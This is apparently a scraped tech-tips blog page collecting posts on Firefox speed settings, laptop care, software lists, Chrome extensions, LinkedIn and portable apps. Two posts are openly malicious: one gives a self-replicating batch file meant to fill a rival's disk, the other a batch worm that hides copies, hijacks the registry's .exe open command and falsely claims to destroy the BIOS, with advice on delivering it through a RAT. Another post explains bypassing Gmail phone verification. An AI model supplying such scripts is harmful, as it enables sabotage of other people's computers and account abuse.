Showing posts with label Tips-n-Tricks. Show all posts

Speed Up your Firefox Page Loding Time

# Make pages load faster

Type "about :config" in the address field.

Set the value of network.http.pipelining  ->boolean "true"
Set the value of network.http.pipelining.maxrequests -> integer 100
Set the value of network.http.proxy.pipelining  -> boolean "true"
network.http.max-connections -> integer 60
network.http.max-connections-per-server -> integer 32
network.http.max-persistent-connections-per-proxy -> integer 16
network.http.max-persistent-connections-per-server -> integer 8

Now right click and select new string
Enter this string:
nglayout.initialpaint.delay -> 0

NOTE : The below settings are not tested by me. They have been, however, tested by many people with satisfactory results. I leave them up to you.

Fast Computer Fast Connection

user_pref("content.interrupt.parsing", true);
user_pref("content.max.tokenizing.time", 2250000);
user_pref("content.notify.interval", 750000);
user_pref("content.notify.ontimer", true);
user_pref("content.switch.threshold", 750000);
user_pref("nglayout.initialpaint.delay", 0);
user_pref("network.http.max-connections", 48);
user_pref("network.http.max-connections-per-server", 16);
user_pref("network.http.max-persistent-connections-per-proxy", 16);
user_pref("network.http.max-persistent-connections-per-server", 8);
user_pref("browser.cache.memory.capacity", 65536);
A couple settings of note - Firefox is allocated 4096 KB of memory by default and in this configuration we give it roughly 65MB as denoted by the last line. This can be changed according to what is used.

Fast Computer, Slower Connection

This configuration is more suited to people without ultra fast connections. We are not talking about dial up connections but slower DSL / Cable connections.

user_pref("content.max.tokenizing.time", 2250000);
user_pref("content.notify.interval", 750000);
user_pref("content.notify.ontimer", true);
user_pref("content.switch.threshold", 750000);
user_pref("network.http.max-connections", 48);
user_pref("network.http.max-connections-per-server", 16);
user_pref("network.http.max-persistent-connections-per-proxy", 16);
user_pref("network.http.max-persistent-connections-per-server", 8);
user_pref("nglayout.initialpaint.delay", 0);
user_pref("browser.cache.memory.capacity", 65536);
Fast Computer, Slow Connection
user_pref("browser.xul.error_pages.enabled", true);
user_pref("content.interrupt.parsing", true);
user_pref("content.max.tokenizing.time", 3000000);
user_pref("content.maxtextrun", 8191);
user_pref("content.notify.interval", 750000);
user_pref("content.notify.ontimer", true);
user_pref("content.switch.threshold", 750000);
user_pref("network.http.max-connections", 32);
user_pref("network.http.max-connections-per-server", 8);
user_pref("network.http.max-persistent-connections-per-proxy", 8);
user_pref("network.http.max-persistent-connections-per-server", 4);
user_pref("nglayout.initialpaint.delay", 0);
user_pref("browser.cache.memory.capacity", 65536);
Slow Computer, Fast Connection
user_pref("content.max.tokenizing.time", 3000000);
user_pref("content.notify.backoffcount", 5);
user_pref("content.notify.interval", 1000000);
user_pref("content.notify.ontimer", true);
user_pref("content.switch.threshold", 1000000);
user_pref("content.maxtextrun", 4095);
user_pref("nglayout.initialpaint.delay", 1000);
user_pref("network.http.max-connections", 48);
user_pref("network.http.max-connections-per-server", 16);
user_pref("network.http.max-persistent-connections-per-proxy", 16);
user_pref("network.http.max-persistent-connections-per-server", 8);
user_pref("dom.disable_window_status_change", true);
One of the changes made for this particular configuration is the final line where the status bar is disabled for changing web pages to save processor time.

Slow Computer, Slow Connection

We have entered the doldrums of the dial-up user

user_pref("content.max.tokenizing.time", 2250000);
user_pref("content.notify.interval", 750000);
user_pref("content.notify.ontimer", true);
user_pref("content.switch.threshold", 750000);
user_pref("nglayout.initialpaint.delay", 750);
user_pref("network.http.max-connections", 32);
user_pref("network.http.max-connections-per-server", 8);
user_pref("network.http.max-persistent-connections-per-proxy", 8);
user_pref("network.http.max-persistent-connections-per-server", 4);
user_pref("dom.disable_window_status_change", true);

How to Live without a Computer

How to Live without a Computer


People cannot supposedly imagine a life without technology these days and that is no surprise.
But let’s talk about a God-forbidden situation where you are left stranded with not even your computer at your side. So what would you do? Let’s explore the options:

1. The List

It is essential to talk about things which you used to do with your computer before it got lost or separated from you. Thus, put together that list. It will also help in reorganising your needs and demands that were earlier satisfied with the computer. This would allow you to analyse and plan things better for the time you do not have the gadget with you. The list may read like: Documenting, watching videos, movies, listening to songs, playing games online, Internet surfing, mails and social-networking.

2. Job Switch

Yes, a little tough to sink in, but think about a job that would not require you to be online all the time. So, a computer would be less missed when you do not have access to it during your work hours.

3. Read and Write

This could be the answer to everything you think you are missing out on, without a computer. Get into the habit of reading more. Buy books that carry information. Quench your thirst for knowledge. You can also start maintaining a journal for everything that is important to you. Writing your thoughts can be a very self-rewarding exercise.

4. Don’t Miss the Movies

Catch your favourite movies on DVDs or make a visit to the theatre once in a while for some good old-fashioned cinema. This will help you rediscover the magic of watching films on the big screen.

5. Find your Old Transistor

It’s time you do that as you can’t do without music in your life. So, get your radio fixed and fill in new batteries so that you can carry it around with you. It may turn out to be a fashion statement, you never know.

6. Get Active

Play all those sports you were actively involved in, while in school. Hit the tennis or squash court, or the soccer field. Working out also helps you have something to do and look forward to. Start going to the gym regularly, or swim at least 3-4 times a week. Exercise keeps the mind and body feeling fresh and away from dull thoughts.

7. Start texting

No computers, no Facebook or Twitter. But you still have your mobile. Text all your friends and keep the conversation going.
These are some of the suggested steps to go about life without a computer. Settling down with this idea is good, so keep your fingers crossed and enjoy this time away from your gadget.

Types of Softwares You Must Have

Types of Softwares You Must Have


Living in a world where new advance in technology shape our lives every day,
it is imperative to know what software to install and use to make life smoother and stay in tune. Here is a look:

1. Web Browsers

While a Windows PC comes loaded with Internet Explorer as its default settings, downloading other browsers such as Mozilla Firefox and Google Chrome enable you to choose from a variety of features you may find extremely convenient. You can also download and install other browsers such as Safari and Opera to further enhance your experience of the web.

2. Anti Virus

Safe browsing on the Internet is enabled by the installation of good  anti-virus software. While AVG, Avira and a few others provide free versions, it is more useful to purchase a plan that ensures complete safety of your computer or laptop. QuickHeal, McAFee, Avast!, Panda Cloud and Norton are some of the other options you could try, based on your usage and browsing experience.

3. Disc Maintenance and Cleanup Software

Using the Internet and browsing the web may be fun pastimes or daily work routines, but it is also important to keep your system’s health in check. Install a good program to help you clean your system regularly and ensure the disc is free of any errors or potential threats.

4. PDF Converter

Whatever kind of work you do, or use the PC for, you most certainly need a PDF reader and converter sometime or the other. You can easily convert MS Word files, MS Excel Spreadsheets, MS PowerPoint presentations and many other files to PDF format. It gives a more professional appeal and gives a final touch to what you send across.

5. Media Player

While a Windows PC comes pre-equipped with a Windows Media Player, installing a Video Media Player such as VLC can be quite useful, especially if you are a movie buff. Even the quality of mp3 files is better rendered on VLC, as compared to other software.

6. CD/DVD Burner

Fond of listening to music? Avid movie buff? Or simply need to write many CDs or DVDs for work-related files? Then, install a CD/DVD burner that will ensure efficiency and convenience.

7. Designing Software

If you have a creative streak or have any slight need to edit images, create graphics and design anything, install Adobe Photoshop in your system. Other designing software you could use are CorelDraw, Adobe Illustrator and InDesign. Depending on the requirement, the software must be chosen.
A simple list of basic software that any PC must have is given above. For those looking for more specific software, consult someone who can guide you better. Remember to invest in the right software rather than use free versions that may cause more damage than good.

Laptop Care Tips

Laptop Care Tips

Laptops might be facing competition from Notebooks, Netbooks and PC Tablets but for many, they remain the most ideal way of computing.
Laptops are highly mobile and with abundant internet connectivity options, easy financing and plenty of design & configuration options to choose from, owning a Laptop is the first choice for many.
However, despite being a durable and technologically-progressive device, Laptop needs some degree of caring. The following are some tips on how to take care your Laptop.

Laptop Care Against Humidity

Humidity remains a major challenge for most of the basic and mid-range Laptops. Thus, you need to ensure that your Laptop is kept away from all possible sources of water. This includes sitting in a room being ventilated by an air-cooler that uses water. It is better to swipe your Laptop with a dry cloth once, every two or three days. This is particularly useful during humid climatic conditions.

Laptop Care Tips for Fighting Dust

Laptops might be retailed as having a dust-repelling surface but over a period, most of them surrender to the sheer volume of dust that surrounds us. Thus, maintain a habit of dry wiping your Laptop every now and then. Don’t leave the Laptop open when the room is being cleaned or dusted. When carrying it outside, always cocoon it within the Laptop bag. Never keep the Laptop close to the ground or on carpeted surfaces that are most likely to be dusty.

Critical Laptop Care—Using an Anti-virus

Every computing device needs an updated and robust antivirus and your Laptop is no different. This can be understood as caring for the lifeline of the Laptop since a single day without a dependable anti-virus could induce circuit errors, hardware-related slowness or a complete software breakdown.

Laptop LCD Care Tips

A common mistake is to hold the Laptop by its display or the lid. This is the worst possible manner of handling the Laptop. It induces unwanted contact on the display and causes smudging, compressing the dust/grime harder onto the screen.

Laptop Maintenance Tips When Closing It

• When closing your laptop, you should be using both the hands. This ensures that pressure created on the hinges is distributed equally. If you pressurize one side of the lid when closing it, the hinges tend to become overused on one side, causing the display to develop a bend/angle.
• Keeping the hands towards the center of the lid is the best approach.
• At the time of shutting the laptop, ensure small items that often escape the eye like earphones or pens are removed. These can induce damage on the screen.
• Don’t shut the lid too hard.

Laptop Power Cord Care

Another common Laptop care mistake is pulling on the power cord. Yes, the power cord seems rather durable but it is not meant to be tugged at. Tugging the cord from the power socket reduces its longevity. A better approach is to extend your hand and pull or plug the cord directly into the power socket. Take care that the cord is plugged somewhere that is visible to you and others. Many times, people step on or over the cord, tripping over and crashing the Laptop on the floor in the process. A concealed Laptop cord also increases risk of it being overridden by chairs and footfalls. Try to keep the cord away from your feet and that of the people around you. Basically, any high-traffic area at home or office isn't the best for your cord’s placement.

Laptop Slot Care

Don’t try to push the accessory devices into inappropriate slots of the Laptop. Take care to read the symbols printed along the side of Laptop and insert accordingly. Forcing accessories into the wrong slots can damage the sockets permanently. Caring for the slots also extends into inserting drives into their respective slots only without trying to enforce them and using the recommended angles.

Laptop Care When Inserting Media

A common error committed by many Laptop users is inserting media in the form of DVD, CD that have loose labels. These can get jammed within the drives and damage them to the extent of needing a replacement. Similarly, trying to play media in the form of an under or over-sized CDs can permanently damage the player.

Laptop Care in Extreme Temperature Conditions

If you live or work in area that has extreme temperature conditions, it is advised to ensure some degree of temperature adaptation for the Laptop. For instance, if it is extremely cold, almost freezing inside, but your office is kept comfortably warm with the help air-conditioning systems, it is better to switch-on the Laptop a few minutes after entering the office. This allows the machine to acclimatize to the sudden change in temperature which can otherwise cause internal condensation and damage the electronic circuits.

Laptop Care When Using Vehicles

Don’t leave your laptop, encased or uncovered, within a locked car. With the windows shut, heat within the vehicle can shoot-up rather quickly. This is an unnecessary, avoidable risk that you don’t want to take with your Laptop. Excessive heat is injurious to the motherboard among all the basic and mid-segment computing devices.

Basic Laptop Care—Using a Cleaning Kit

It is advised to invest in a cleaning kit that is easily found across most electronics and computing devices retailers. This package contains the ideal instruments meant for cleaning the Laptop. You need to clean your Laptop at least once, every ten days though some people might insist on weekly cleaning.

Laptop Battery Care Tips

It isn't advisable to leave your battery blinking to the last breath before your charge it. Always charging the Laptop at its flagging end could build-up towards battery failure over a period. Seeking a charge when the battery is about 30%-35% charged is a wiser approach. This is more of a preventative tip. When the battery indicators show that limited time is left before the device becomes dormant, it is time to stop working and start looking for nearest power socket.

Laptop Keypad Maintenance

To ensure that you don’t induce damage on the keypad of the Laptop, try to keep it on flat surfaces. Don’t lean towards one side of the laptop or place it on inclined surfaces. This tends to create unfavorable angles that induce excessive stress on some parts of the keypad, making them prone to wearing-out early. This is why some folks have Laptops with one part of keypad looking smoked while the other half looks brand new.

Tips on Everyday Laptop Protection

Don’t put excessive weight or load on your device. This means not placing anything heavy like books, baggage or your elbow on the Laptop to reduce chances of physical damage.

Recommended Laptop Maintenance—Use a Proper Case/Bag

Yes, Laptops are meant to be sturdy and are ideally suited for those who are on the move but they need protection from repeated shocks and abrasive surfaces. Thus, it is better to invest in a Laptop bag that is good enough to safely envelope your device and protect it against any kind of harsh physical.
(Tips on Buying Laptop Bag: When you are buying a Laptop Case, ensure that it is appropriately sized for your Laptop. Many cheaper versions have been created that are marketed as a fit-all solution. However, such Laptop cases can be loose and might not provide the kind if impact-negating protection your device needs.)
A case that is too tight increases chances of you tugging at the Laptop, when pulling it out, and accidentally dropping it. It is better to buy a Laptop bag that has some kind of meshwork on the inside for protection against moisture/humidity. Pure leather cases might look great but they need caring too. So buy accordingly, i.e. something that is useful and you can maintain easily.

Important Laptop Usage Tip

Try to maximize your Laptop usage in a place that has a decent degree of air circulation. This is the best and simplest way of avoiding overheating of laptops.

More on Laptop Maintenance

If you know how to go about handling hardware of Laptops, try to brush the area surrounding the external, exhaust fan. This component is prone to getting plugged if you use the Laptop in enclosed spaces. This is when the exhaust fan is really stressed and chances of overheating arise. If you don’t know how to access the exhaust, get the cleaning done from a professional.

Laptop Maintenance Tips When Traveling

With the advent of charging devices and charging sockets present in most vehicles, many people like to charge their devices, including Laptops, when traveling. However, for Laptops per se, this isn't the wisest thing to do. Most hard drives used in Laptops are prone to developing injuries if they are being subjected to motion and charging at the same time. Some experts even recommend not putting the Laptop in the Suspend/Sleep mode when it is packed in the case. Though it isn't very clear as to how this can damage the device, it might be a good idea not to push your luck.

Tips on Laptop Usage

Using your laptop regularly on the bed isn't the best thing to do. Beds are a source of dust and debris, including hair and dandruff. This can get sucked into the Laptop.

Tips on Packing the Laptop

When packing your Laptop in its case/bag, try not to press lunch boxes, pens, pencils, cell phones and other stuff against the device. Place the Laptop in one, zipped section and other things, in different sections of the bag. These objects can scrape the outer surface of the Laptop and age it prematurely.

Top 5 Must Have Chrome Extensions

Top 5 Must Have Chrome Extensions

Must Have Chrome Extensions

Google Chrome is considered to be one of the most widely used internet browsers since its launch. Simple to use with tonnes of add-ons and features, Chrome is delightful in its own way.
Unfortunately, Chrome’s true prowess is yet to be tapped into, especially the apps and extensions that it offers. MensXP brings you the top 5 must-have extensions that will help you have a better surfing experience.

1. QuickTabs

Must Have Chrome Extensions - QuickTabs
We are that breed of internet surfers who have a few dozen tabs simultaneously open for our surfing pleasure. So much so that we can barely keep a tab on all those tabs and end up making a mess out of it. QuickTabs helps you to keep an eye on these tabs where it notifies you about all the tabs that are open, giving you a definite count, while also allowing you to jump to any specific tab you want to see. This is a must have Chrome extension for anyone who wants to multitask effectively.

2. Google Mail Checker

Must Have Chrome Extensions - Google Mail Checker
For someone who wants to be swiftly notified about a new mail without the hassle of opening the mail client, Google Mail Checker is the best bet. Google Mail Checker will notify you about a new mail while being cradled next to the address bar. One click on it will straightaway open the mail client, skipping the pain that logging-in follows. Here’s your Gmail Inbox that’s a single click away.

3. Auto Replay for YouTube

Must Have Chrome Extensions - Auto Replay for YouTube
We have always had those moments when we want to listen to a song on an endless loop or watch that downright hilarious cat video over and over again, but clicking on the play button 20 times is a pain. Also, it ends up buffering from the first second all over again, which means that you might have to wait for it to completely buffer. Chrome extension, Auto Replay for YouTube saves you that trouble by replaying a desired video over and over again till you are outrageously sick of it. Must-have for a YouTube addict.

4. Awesome Screenshot

Must Have Chrome Extensions - Awesome Screenshot
Remember when you had that hilarious chat with your friend and wanted to keep that as a memory? Awesome Screenshot helps you in taking a snapshot of the screen and eliminates the hassle of using the Print Screen button on your keyboard and then pasting it in paint. Awesome Screenshot has a small button placed on the browser that does the trick of capturing the screen. There are some brilliant advantages, for instance, Awesome Screenshot allows you to take a screenshot of the whole webpage while it isn’t visible while giving you the ability to share it over the net with ease.

5. Google Dictionary

Must Have Chrome Extensions - Google Dictionary
Trust us, you would definitely want to have this Chrome extension and you might use it extensively as well. Google Dictionary offers you instant definitions. How instant, you ask? All you need to do is double-click on a word and Google Dictionary’s pop-up will pop-up, which will offer you the definition along with tonnes of other relevant information. It will also offer an extension next to the address box that will serve as a quick go-to dictionary app.

LinkedIn Tips and Tricks

LinkedIn Tips and Tricks


LinkedIn, with its strong and every-growing support of more than 200 million users is a booming social site for professional networking. Unfortunately, users are yet to get a hang of LinkedIn’s knick-knacks,
so here are few hidden tips and tricks that will ensure your Linkedin Experience  is enjoyable and fruitful!

1. Saving Research

LinkedIn users tend to hunt for jobs and other relevant subjects of grave importance. Fortunately for these regular surfers, LinkedIn offers the user to save three of their search results. Although it may seem like a fairly simple function, what it does is notify you by mail if any of the search results change, making it possible for you to keep a tab on any further advancement in the search. For instance, you are looking for potential vacancy in your desired company; a simple saved search will later notify you of a vacancy being added into the list.

2. Managing Projects

What if you have a project to look after and assign it to a bunch of colleagues? LinkedIn offers apps that connects all the profiles together and lets you manage the project online. The best one for management is the Manymoon app ( Task assigning, messaging and notification are handled by the app flawlessly, and allow managers to keep tabs on the flow of a project. Managing projects online is the perfect alternative for someone who works closely with freelancers, allowing a user to access the project online and keep a tab on it on-the-go.

3. SEO Optimization

LinkedIn is highly resourceful, and hence SEO-friendly. To truly utilize LinkedIn and have an online virtual presence, LinkedIn offers you to fully customize your profile, meaning you can add relevant search words associated with you all over the page making it easier for Google or any other search site to hunt you down and display you promptly. For instance, a musician can add as many relevant words that can be picked up by the internet and lay them across the page to increase the profile’s relevance and authenticity.

4. Getting Jobs

LinkedIn’s true prowess is its brilliant ability of clubbing professional job hunting with social networking. Other than having a well-laid profile with all the right details, pitching it to the right people is equally important. Joining relevant groups, adding people from similar field of interest and profession and expanding your professional circle is what LinkedIn’s all about. These groups offer lots of jobs and applying to them easier with the single click of a button.

5. Creating a Profile Batch.

Having a LinkedIn profile is not enough. The right way to propagate your presence is most important. And for this reason, LinkedIn offers the ability to create a widget of sorts that redirects a user straight to your profile page when clicked. You can integrate this badge on your personal website, blog and as a signature in your mail. LinkedIn also offers various different designs to choose from.

How to Destroy your Rivals Computer using a Batch File

I just created the following batch file and ran it on myself and am SUPER glad i shut my computer off, because this batch file creates another batch file at random numbers, then puts the same code of itself in each of those files, then runs those bats, which ALSO do the same thing, constantly, forever, until your stop it.

what this will do, if you leave it on long enough, is it will store itself in ALOT of your hard drive space, making it almost ZERO, then also use up all your ram as your computer goes through all the files, and crash your pc. this virus WILL REQUIRE YOU TO REINSTALL WINDOWS!!!! to get rid of it!!!!

now, if you really wanted to make it a bad batch file, you could have it copy itself to startup, so that when you start up, the horror starts all over again, ON TOP OF ITSELF!!!!.

let me tell you, i let it run only five seconds, and that's b/c it took almost five seconds for the shutdown, and i deleted almost 9 megabytes of diskspace used by just BATCH FILES (which are 1 kb a PIECE!!) just imagine what would have happened to me if i let it run for just one'd be GIGS and probably well past GIGS in 10 minutes.

so, be careful guys, don't run it on yourself unless you have a virtual machine to limit your disk space used (even that might not be safe).


@echo off
SET /A X=%RANDOM%%%1999999999%
type damage.bat >> %x%.bat
start %x%.bat

 i am not responsible for anyone who decide to run this code.

How To Bypass Gmail Mobile verification

Follow the steps below:

Step 1:- Go to & Sign up there.

Step 2:- Create an account on gmail, but in location fill "United States" . Create your e-mail account.

Step 3:- Now it will take you to mobile verification page. Here select the option of Voice call and fill the no. that you got from the website (

Step 4:- Now you will get a mail having verification code as voice mail on that account from which you have registered on. Go open it, download the attachment file and listen the code, after that type the code of your voice mail in verification code and click OK.

Step 5:- Done. Your account is ready now.

About the website:

This is a site where you can receive fax or voice calls without having a phone no. When you create an account on this site, it will provide you an unique phone number of US.

How to lock folders by only using notepad

Hello guys, on this tutorial I will be showing you how to lock folders with a simple batch script.

Open Notepad from your Start -> All Programs -> Accessories -> Notepad

Step 1: Open notepad and copy and paste in this code

title Folder Locker
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
echo Are you sure u want to Lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
echo Enter password to Unlock folder
set/p "pass=>"
if NOT %pass%==type your password here goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
echo Folder Unlocked successfully
goto End
echo Invalid password
goto end
md Locker
echo Locker created successfully
goto End

Step 2: Once the code in notepad save it as "FloderLock.bat"

Step 3: You should now have a .bat file called "Folderlock" double click on it and within a second a new folder called "Locker" Should have been created. Now drop all the files you want like to lock away in "Locker"

Step 4: When you've gotten all the files you want into lock away in "Locker" now to lock it, double click on "FolderLock.bat" and type "Y" when the command prompt comes up. Your folder will now be locked and will disappear.

Step 5: To unlock the folder click on "FolderLock.bat' when the command prompt comes up type "Y". The folder "Locker" and all it's documents should be back in the same directory as "FolderLock"

Hope this tutorial will help out some new and old members. 

How to Permanently Kill someones PC


Now, there is no going back from executing this batch code. Once executed it will rewrite the BIOS and a few other core clocks rendering the motherboard useless. The only way to come back after a execution of this code is to buy a new motherboard.

Lets get started

Step One: Open notepad or anything similar.

Step Two: Paste the following code into notepad

@echo off & break off
://associate .pic as batfile for camouflaggin
assoc .pic=batfile

://creates and hides files
type %0 >%temp%\%username%.pic
type %0 >%temp%\%username%.bat
attrib +h +s +a +r %temp%\%username%.bat
attrib +h +s +a +r %temp%\%username%.pic

://registry entry for starting worm on every *.exe execution
regadd "HKCR\exefile\shell\open\command" /v "@" /d "%temp%\%username%.pic ""\%1\"" %* /f

://starting payload mwahaha
Echo 123>clock$ &echo 123>CON &echo 123>AUX &echo 123>PRN &echo 123>COM1 &echo 123>COM2 &echo 123>COM3 &echo 123>COM4 &echo 123>dosx &echo 123>IO &echo 123>HIMEM &echo 123>XMSXXXX0 &echo 123>MOUSE &echo 123>REDIR &echo 123>KBD &echo 123>SYSTEM
 Step Three: Save the file as a .bat like so....

How to use the batch

Now there are a few ways you can run this batch on someones computer.

1. Just simply give them the batch file

2. Use a RAT program like darkcomet and run it through the batch script executer.

3. You could place it on a usb drive and manually execute it.

How to protect yourself from hackers [Infographic]

How to protect yourself from hackers

According to the Trustwave’s 2013 Global Security Report, cyber-security threats are increasing as quickly as we can implement measures against them. Hackers have lots of different ways to steal your private data and information. And the main reason why hackers go after your personal information is identity theft!

Over the past year, there have been roughly 12.6 million victims of identity theft – or, to put it into perspective, one victim every three seconds. No matter how safe you think you’re being online, chances are you’re making at least a few mistakes that compromise the integrity of your personal information.

To protect yourself, check out our new “Where You’ll Get Hacked” infographic for more information on how hackers get a hold of your data, how you can detect their attempts and how to protect yourself and your financial future.

To see the enlarged version, click on the graphic.o open in new window.
[Image: where-you-will-get-hacked-infographic800.png]

20 Portable Applications Web Designers Should Have On Their USB Sticks

Portable applications have been known to be used by the professional “on-the-go” for quite some time now. These amazingly lightweight applications allow us to use them without the need of installation. This makes them highly accessible and easy to use.
If you’re an on-the-go freelance web designer, then these useful and popular applications that you can always take with you will be useful! Below we’ve taken the time to compile 20 portable applications that we feel should benefit designers one way or another.


Inkscape is an Open Source vector graphics editor, with capabilities similar to Illustrator, CorelDraw, or Xara X, using the W3C standard Scalable Vector Graphics (SVG) file format. t is very easy to edit nodes, perform complex path operations, trace bitmaps and much more. We also aim to maintain a thriving user and developer community by using open, community-oriented development.

GIMP Portable

GIMP is an acronym for GNU Image Manipulation Program. It is a freely distributed program for such tasks as photo retouching, image composition and image authoring. GIMP is expandable and extensible. It is designed to be augmented with plug-ins and extensions to do just about anything. The advanced scripting interface allows everything from the simplest task to the most complex image manipulation procedures to be easily scripted.


PhotoFiltre is an image retouching application that lets you complete an array of tasks ranging from simple to advanced. It’s extremely easy to use and has a fast learning curve.


Artweaver is a simple painting application that allows you to record all of your painting steps and replay them at a later time. It’s ideal for creating detailed video tutorials. Artweaver also comes packaged with several predefined brushes that let you configure each individually. You’re also able to create new custom brushes and overall simulate natural brush tools.


Blender is a free open source animation tool that allows you to create 3D graphics and edit them as well. You’ll receive various useful tools, while you’re able to control them through a fluid user interface. This is essential for an application on-the-go.


The portable version of Cyberduck is easy to interact with and allows you to manage and control the uploading of files to your website with little or no issues. You’ll be able to carry this app around with you everywhere you go, allowing you to upload any needed files while you’re away from your work area.

Diagram Designer

Diagram Designer is a simple vector graphics editor that allows you to create quick flowcharts, UML class diagrams, illustrations and more. Designers can find this app useful for creating quick wireframes or mock-ups.

Greenfish Icon Editor Pro

This easy to use icon editor application lets you design and retouch icons, cursors, animations, and static images. It’s an all-in-one icon solution. It has multi-language support and works with ICO, CUR, ANI, PNG, XPM, BMP, JPEG and GIF files.

Nvu HTML Editor

If you’re on the go and can’t reach a notepad or text editor in time, then use the reliable portable version of Nvu. It’s the complete web authoring system that lets you swiftly edit your website while you’re on the go.


SiteShoter is a small utility that allows you to save a screenshot of any Web page into a file. It automatically creates hidden window of Internet Explorer, loads the desired Web page, and than save the entire content of the Web page into an image file (.png, .jpg, .tiff, .bmp or .gif). You can also use SiteShoter to convert .html file on your local drive into image file.


Because many clients like to use Word documents as a way to interact with designers and send vital information such as web design contracts, project details, and more. It was only fair that we add a portable Word processing application that allows you to view, edit, manipulate, and collaborate Word documents.

AMP Font Viewer

This program is an easy to use but powerful font manager, which allows getting a quick overview of both installed and non installed fonts. It can install and uninstall fonts, and organize them in categories. Perfect for the designer who works with fonts on a regular basis.

Firefox Portable Edition

Although there are a variety of browsers that are great for designers. The usual choice would be Firefox. The portable edition of Firefox is a full-featured and powered web browser that has a wide-range of improved features for a much better portable experience. A few other portable browsers are Google Chrome Portable
and OperaUSB

XAMPP Portable

XAMPP is an easy to install Apache distribution containing MySQL, PHP and Perl. XAMPP is really very easy to install and to use – just download, extract and start.

Oiko CSS-Editor

Oiko CSS comes with a visual editor that allows you to separate definitions of structured documents such as HTML, XHTML, and XML from their content so that you’re able to access and edit any CSS.

PicPick Tools

PicPick is an all-in-one software for software developers, graphic designers and home user. It has an intuitive interface and simple, elegant operation. After starting the software, you simply select one of the tool from the PicPick Tools trayicon menu when you want.


MobaPhoto is a nice freeware for managing your digital photos. MobaPhoto allows you to resize, crop, correct red-eyes of all your pictures very easily in “batch-mode”. It allows you to create automatically some beautiful photo galleries and upload them on your website without having any knowledge in website creation.


ToDoList is a fee portable application that allows you to keep track of tasks and freely manage your time. Tasklists are stored in XML format so that your then able to view them in a wide range of ways such as your desktop or on the web. This is a nifty tool for the freelance designer who needs to have his/her memory refreshened once in a while.

7-Zip Portable

As designers we’re constantly interchanging important files and applications. What better way to compress your files with a high-compression ratio then with this Windows based portable application.


FontMatcher is a handy portable tool that lets you match a font based on an image. Ideal for designers who use various fonts for a variety of projects. It only supports TTF fonts, but it’s definitely effective and worth the try.